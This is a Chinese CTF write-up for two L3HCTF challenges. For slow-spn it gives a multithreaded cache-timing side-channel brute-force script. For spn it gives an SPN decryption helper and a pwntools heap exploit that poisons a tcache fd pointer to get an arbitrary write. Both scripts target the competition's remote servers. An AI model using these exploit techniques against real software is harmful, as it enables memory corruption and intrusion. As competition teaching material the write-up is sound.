分类 L3HCTF 下的文章

slow-spn

本题里面cacheLine是一个缓存单元的类型,__maccess()函数负责检查cacheLine是否命中,以及置换掉最少命中次数的cacheLine

思路:侧信道泄露+爆破

struct cacheLine
{
  uint32_t tag;
  uint32_t last_used;
};
key = flag[0:6]
plain = flag[6:10]
                          k>>n*4
                             ↓
plaintext -> |SS| -> |P| -> XOR -> ... -> |SS| -> |P| -> cipher

... --> |SS| --(vuln)--> |&cache| --> |P| --> ...

getflag的脚本

from pwn import *
from hashlib import sha256
from pwnlib.util.iters import mbruteforce

context.log_level = 'debug'
def pow(p):
    p.recvuntil(b"hashlib.sha256( x + \"")
    c = p.recvuntil("\"" , drop = True)
    print(c)
    proof = mbruteforce(lambda x: sha256(x.encode() + c).hexdigest()[:6] == '000000'
                        , '0123456789', length=8, method='fixed')
    p.sendline(proof)
def getflag(key , m):
    p.recvuntil(b'Input possible spn key (hex):')
    p.sendline(key)
    p.recvuntil(b'Input possible spn plaintext (hex):')
    p.sendline(m)
    res = p.recv()
    if res == b'Wrong.':
        return 0
    else:
        print(res)


p = remote('124.71.173.176' ,8888)
pow(p)
getflag('11' , '1111')

脚本比较乱就贴个爆第一轮的上来好了,后面差不多:

#exp_round1.py
from pwn import *
import sys
from chall import ss_box, p_box, ss_box_addr, p_box_addr
from time import time, sleep
import threading

ss_map = defaultdict(list)
p_map = defaultdict(list)
stop_flag = False

#context.log_level = "debug"

class MyThread(threading.Thread):  
    def __init__(self, func, args=()):  
        super(MyThread, self).__init__()  
        self.func = func  
        self.args = args  
  
    def run(self):  
        self.result = self.func(*self.args)
  
    def get_result(self):  
        try:  
            return self.result  
        except Exception as e:  
            return None  

    def get_args(self, _idx=None):
        return self.args if _idx == None else self.args[_idx]
            
class MyPipe:
    def __init__(self, _addr, _typ="local"):
        if _typ == "local":
            self.raw_p = process(_addr)
        else:
            self.raw_p = remote(_addr[0], _addr[1])
    
    def maccess(self, addr, speed):
        print(f"Addr: {addr}")
        print(f"Fetch cache: {hex((addr>>5) & 0x1F)}\nCache tag: {hex(addr>>10)}")
        self.raw_p.sendlineafter(b"What to do?\n", b"1")
        self.raw_p.sendlineafter(b"Where?\n", str(addr).encode())
        self.raw_p.sendlineafter(b"Speed up?\n", str(speed).encode())

    def conti(self):
        self.raw_p.sendlineafter(b"What to do?\n", b"2")
       
    def leave(self):
        self.raw_p.sendlineafter(b"What to do?\n", b"3")
        
    def skip(self):
        self.raw_p.sendlineafter(b"What to do?\n", b"4")

    def recv(self, num=2048):
        return self.raw_p.recv(num)

    def recvall(self):
        return self.raw_p.recvall()

    def close(self):
        self.raw_p.close()
    
def calc_cacheline(addr:int):
    return (addr>>5) & 0x1F

def calc_tag(addr:int):
    return (addr>>10)
    
def map_i(addr):
    return (calc_cacheline(addr), calc_tag(addr))
    
def gen_target(cache_pos, tag):
    return (tag << 10) + (cache_pos << 5)

def ss_box_item(addr):
    return ss_box[(addr-ss_box_addr)//4]

def p_box_item(addr):
    return p_box[(addr-p_box_addr)//4]

def ss_item_addr(value):
    return ss_box_addr+ss_box.index(value)*4

def p_item_addr(value):
    return p_box_addr+p_box.index(value)*4

def init():
    global ss_map
    global p_map
    for ss_item_addr in range(ss_box_addr, ss_box_addr+len(ss_box)*4, 4):
        ss_map[map_i(ss_item_addr)].append(ss_box_item(ss_item_addr))
    print(f"ss_map size: {hex(len(ss_map))}")
    for p_item_addr in range(p_box_addr, p_box_addr+len(p_box)*4, 4):
        p_map[map_i(p_item_addr)].append(p_box_item(p_item_addr))
    print(f"p_map size: {hex(len(p_map))}")

s1_list = []
p1_list = []
s1_matched = []

def burp_round_1():
    MAX_THREAD = 0x100
    global stop_flag
    stop_flag = False

    def check_si_fetch(p:MyPipe, cache_info):
        global stop_flag
        if stop_flag:
            p.close()
            return False
        p.maccess(ss_item_addr(ss_map[cache_info][0]), 1) # speed up
        p.conti()
        t1 = time()
        p.recv(1)
        t2 = time()
        #print(t2-t1)
        p.close()
        if t2-t1 >= 0.95:
            return False
        else:
            stop_flag = True
            return True

    pool = []
    init_active = threading.active_count()
    for cache_info in ss_map.keys():
        if stop_flag:
            break
        th = MyThread(func=check_si_fetch, args=(MyPipe(("124.71.173.176", 9999), "remote"), cache_info))
        th.setDaemon(True)
        while True:
            if threading.active_count()-init_active > MAX_THREAD:
                sleep(0.8)
            else:
                th.start()
                pool.append(th)
                #print(th.get_args(1))
                break
    for th in pool:
        th.join()
        if th.get_result() == True:
            s1_cache_info = th.get_args(1)
            s1_list = ss_map[s1_cache_info]
            break
    print(f"s1_cache_info: {s1_cache_info}")
    print(f"s1_list: {s1_list}")

    for s1 in s1_list:
        p = MyPipe(("124.71.173.176", 9999), "remote")
        p.skip()
        p.maccess(p_item_addr(p_box[s1]), 1) # speed up
        p.conti()
        t1 = time()
        p.recv(1)
        t2 = time()
        if(t2-t1 >= 0.96):
            print("Miss")
            p.close()
        else:
            p1_cache_info = map_i(p_item_addr(p_box[s1]))
            print(f"Got p1 cache info: {p1_cache_info}")
            p1_list.append(p_box[s1])
            s1_matched.append(s1)
            p.close()
    print(f"p1_list: {p1_list}")
    print(f"s1_matched: {s1_matched}")

def exp():
    init()
    burp_round_1()

if __name__ == "__main__":
    exp()

第四组不用爆完,本地调试的时候线程开多点爆完验证一下就好

[remote]

round 1:
p1_list: [24177, 24160, 24176, 20336]
s1_matched: [20075, 20072, 20074, 20070]

round 2:
p2_list: [29651, 29634]
s2_matched: [10975, 10972]

round 3:
p3_list: [51619, 55459, 51635]
s3_matched: [59445, 59449, 59447]

然后根据上面的信息拿mlist和klist:

p1_list = [24177, 24160, 24176, 20336]
s1_matched = [20075, 20072, 20074, 20070]
p2_list = [29651, 29634]
s2_matched = [10975, 10972]
p3_list = [51619, 55459, 51635]
s3_matched = [59445, 59449, 59447]
mlist = [hex(ss_box.index(i))[2:].rjust(4 , '0') for i in s1_matched]
k2list = []
k1list = []
for s in s2_matched:
    for p in p1_list:
        temp = ss_box.index(s)
        a = p ^ temp
        k1list.append(a)
for s in s3_matched:
    for p in p2_list:
        temp = ss_box.index(s)
        a = p ^ temp
        k2list.append(a)
klist = []
for k1 in k1list:
    for k2 in k2list:
        temp1 = k1 &0xfff
        temp2 = k2 >> 4
        if temp1 == temp2:
            klist.append((k1 <<4)+(k2&0xf))

print(mlist)

spn

sbox = [0xE, 4, 0xD, 1, 2, 0xF, 0xB, 8, 3, 0xA, 6, 0xC, 5, 9 , 0 , 7]
pbox = [1, 5, 9, 0xD, 2, 6, 0xA, 0xE, 3, 7, 0xB, 0xF, 4, 8,0xC, 0x10]
masks = [0x8000, 0x4000, 0x2000, 0x1000, 0x800, 0x400, 0x200, 0x100,0x80, 0x40, 0x20, 0x10, 8, 4, 2, 1]
key = [0x3a94,0xa94d ,0x94d6,0x4d63,0xd63f]
def re_s(c):
    res = 0
    for i in range(4):
        temp = c % 16
        res += sbox.index(temp)*2**(4*i)
        c //= 16
    return res
def re_p(c):
    res = 0
    for i in range(16):
        if c &(0x8000>>i) != 0:
            res |=(0x8000 >> (pbox[i] - 1))
    return res

def dec(m):
    m = (m[1]<<8) | m[0]
    m ^= key[-1]
    for i in range(3):
        m = re_s(m)
        m ^= key[-(i+2)]
        m = re_p(m)
    m = re_s(m)
    m ^= key[0]
    m = bytes([m&0xff , m >> 8])
    return m
def decrypt(m):
    c = b''
    assert len(m) % 2 == 0
    for i in range(len(m) // 2):
        c += dec(m[i*2:i*2+2])
    return c

print(decrypt(b'4N4N4N4N'))

过spn的脚本,调用decrypt(想要在内存写的东西),然后把返回值扔过去就行了。
密文长度必须是2的倍数,如果不是2的倍数远程会默认后面是\x00或者是其他的奇奇怪怪的东西,为了避免错误建议用2的倍数

鉴于decrypt出来的值不太稳定改成两次edit,第一次收集下变化的部分放进nonaddlist第二次正常打

from pwn import *

#p = process("./SPN_ENC", env = {"LD_PRELOAD": "./libc-2.27.so"})
#p = process("./SPN_ENC")
p = remote("124.71.194.126", 9999)
context.log_level = "debug"

sbox = [0xE, 4, 0xD, 1, 2, 0xF, 0xB, 8, 3, 0xA, 6, 0xC, 5, 9 , 0 , 7]
pbox = [1, 5, 9, 0xD, 2, 6, 0xA, 0xE, 3, 7, 0xB, 0xF, 4, 8,0xC, 0x10]
masks = [0x8000, 0x4000, 0x2000, 0x1000, 0x800, 0x400, 0x200, 0x100,0x80, 0x40, 0x20, 0x10, 8, 4, 2, 1]
key = [0x3a94,0xa94d ,0x94d6,0x4d63,0xd63f]
nonaddlist = []

def re_s(c):
    res = 0
    for i in range(4):
        temp = c % 16
        res += sbox.index(temp)*2**(4*i)
        c //= 16
    return res
def re_p(c):
    res = 0
    for i in range(16):
        if c &(0x8000>>i) != 0:
            res |=(0x8000 >> (pbox[i] - 1))
    return res

def dec(m):
    addnum = 0
    if m in nonaddlist:
        addnum = 1
    m = (m[1]<<8) | m[0]
    m ^= key[-1]
    for i in range(3):
        m = re_s(m)
        m ^= key[-(i+2)]
        m = re_p(m)
    m = re_s(m)
    m ^= key[0]
    
    m = bytes([m&0xff , (m >> 8)+addnum])
    return m
def decrypt(m):
    c = b''
    assert len(m) % 2 == 0
    for i in range(len(m) // 2):
        c += dec(m[i*2:i*2+2])
    return c

def malloc(size, idx):
    p.sendlineafter(b"0.exit\n", b"1")
    p.sendlineafter(b"Size:\n", str(size).encode())
    p.sendlineafter(b"Index:\n", str(idx).encode())
    
def edit(index, size, content):
    p.sendlineafter(b"0.exit\n", b"2")
    p.sendlineafter(b"Index:\n", str(index).encode())
    p.sendlineafter(b"Size\n", str(size).encode())
    p.sendafter(b"Content\n", content)
    
def free(idx):
    p.sendlineafter(b"0.exit\n", b"3")
    p.sendlineafter(b"Index:\n", str(idx).encode())
    
def show(idx):
    p.sendlineafter(b"0.exit\n", b"4")
    p.sendlineafter(b"Index:\n", str(idx).encode())

#: 0x555555554000

def exp():
    p.recvuntil(b"gift:")
    gift = int(p.recvuntil(b"\n", drop=True).decode(), 16)
    elf_base = gift - 0x2040E0
    print("gift:", hex(gift))
    print("elf_base:", hex(elf_base))
    
    # malloc
    malloc(0x40, 0)
    for i in range(3):
        malloc(0x20, i+1)
    free(3)
    free(2)
    free(1)
    payload = b"A"*0x40+p64(0)+p64(0x31)+p64(gift)
    payload_dec = decrypt(payload)
    print("Payload len:", hex(len(payload)))
    print(payload.hex())
    print(payload_dec.hex())
    w_size = 0x58
    edit(0, w_size, payload_dec)
    for i in range(0, w_size*2, 4):
        p.recvuntil(b"w:")
        tar = payload_dec.hex()[i+2:i+4]+payload_dec.hex()[i:i+2]
        act = p.recvuntil(b"\n", drop=True).decode().rjust(4, "0")
        print(tar, act)
        if tar != act:
            nonaddlist.append(bytes([payload[i//2]])+bytes([payload[i//2+1]]))
    print(nonaddlist)
    edit(0, w_size, decrypt(payload))
    
    # fetch
    malloc(0x20, 5)
    malloc(0x20, 6)
    edit(6, 8, b"A"*8)
    print("gift:", hex(gift))
    p.sendline(b"5")
    
    p.interactive()

if __name__ == "__main__":
    exp()